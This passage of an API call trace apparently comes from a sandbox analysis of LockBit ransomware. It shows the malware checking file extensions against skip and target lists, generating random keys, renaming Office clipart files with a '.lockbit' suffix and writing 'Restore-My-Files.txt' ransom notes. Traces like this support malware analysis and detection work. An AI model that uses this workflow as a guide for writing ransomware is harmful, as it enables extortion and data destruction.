returned -1 [0113.876] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.876] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00086_.WMF") returned 1 [0113.876] lstrcmpiW (lpString1="ntldr", lpString2="FD00086_.WMF") returned 1 [0113.876] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00086_.WMF") returned 1 [0113.876] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00086_.WMF") returned -1 [0113.876] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00086_.WMF") returned -1 [0113.876] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00086_.WMF") returned 1 [0113.876] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00086_.WMF") returned 1 [0113.877] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.877] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned=".WMF" [0113.877] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.877] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.877] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.878] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.878] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.878] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.878] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.lockbit") returned 72 [0113.878] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0113.878] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.878] malloc (_Size=0x40068) returned 0x3ef0008 [0113.878] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=29212) returned 1 [0113.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0113.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.880] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0113.880] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0113.884] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.884] malloc (_Size=0xa6) returned 0x77d7a8 [0113.884] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.885] free (_Block=0x77d7a8) [0113.885] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.885] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.885] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2c1c00, ftCreationTime.dwHighDateTime=0x1bd4b2d, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a2c1c00, ftLastWriteTime.dwHighDateTime=0x1bd4b2d, nFileSizeHigh=0x0, nFileSizeLow=0x3772, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00090_.WMF", cAlternateFileName="")) returned 1 [0113.885] lstrcmpiW (lpString1=".", lpString2="FD00090_.WMF") returned -1 [0113.885] lstrcmpiW (lpString1="..", lpString2="FD00090_.WMF") returned -1 [0113.885] PathFindExtensionW (pszPath="FD00090_.WMF") returned=".WMF" [0113.885] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.885] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.885] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.885] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.885] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.886] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.886] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00090_.WMF") returned 1 [0113.887] lstrcmpiW (lpString1="ntldr", lpString2="FD00090_.WMF") returned 1 [0113.887] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00090_.WMF") returned 1 [0113.887] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00090_.WMF") returned -1 [0113.887] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00090_.WMF") returned -1 [0113.887] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00090_.WMF") returned 1 [0113.887] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00090_.WMF") returned 1 [0113.887] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.887] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned=".WMF" [0113.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.887] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.887] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.888] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.888] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.lockbit") returned 72 [0113.888] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0113.889] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.889] malloc (_Size=0x40068) returned 0x3d70450 [0113.890] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=14194) returned 1 [0113.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0113.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0113.891] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.912] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.912] malloc (_Size=0xa6) returned 0x77d7a8 [0113.912] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.913] free (_Block=0x77d7a8) [0113.913] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.913] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.913] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.913] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb458ec00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb458ec00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x920e, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00096_.WMF", cAlternateFileName="")) returned 1 [0113.913] lstrcmpiW (lpString1=".", lpString2="FD00096_.WMF") returned -1 [0113.913] lstrcmpiW (lpString1="..", lpString2="FD00096_.WMF") returned -1 [0113.913] PathFindExtensionW (pszPath="FD00096_.WMF") returned=".WMF" [0113.913] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.913] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.913] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.913] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.914] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.915] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.915] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00096_.WMF") returned 1 [0113.915] lstrcmpiW (lpString1="ntldr", lpString2="FD00096_.WMF") returned 1 [0113.916] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00096_.WMF") returned 1 [0113.916] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00096_.WMF") returned -1 [0113.916] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00096_.WMF") returned -1 [0113.916] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00096_.WMF") returned 1 [0113.916] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00096_.WMF") returned 1 [0113.916] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.916] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned=".WMF" [0113.916] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.916] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.916] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.917] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.917] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.lockbit") returned 72 [0113.917] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.918] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.918] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.918] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=37390) returned 1 [0113.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.919] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.919] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.931] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.931] malloc (_Size=0xa6) returned 0x77d7a8 [0113.931] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.932] free (_Block=0x77d7a8) [0113.932] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.932] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.932] CreateFileW 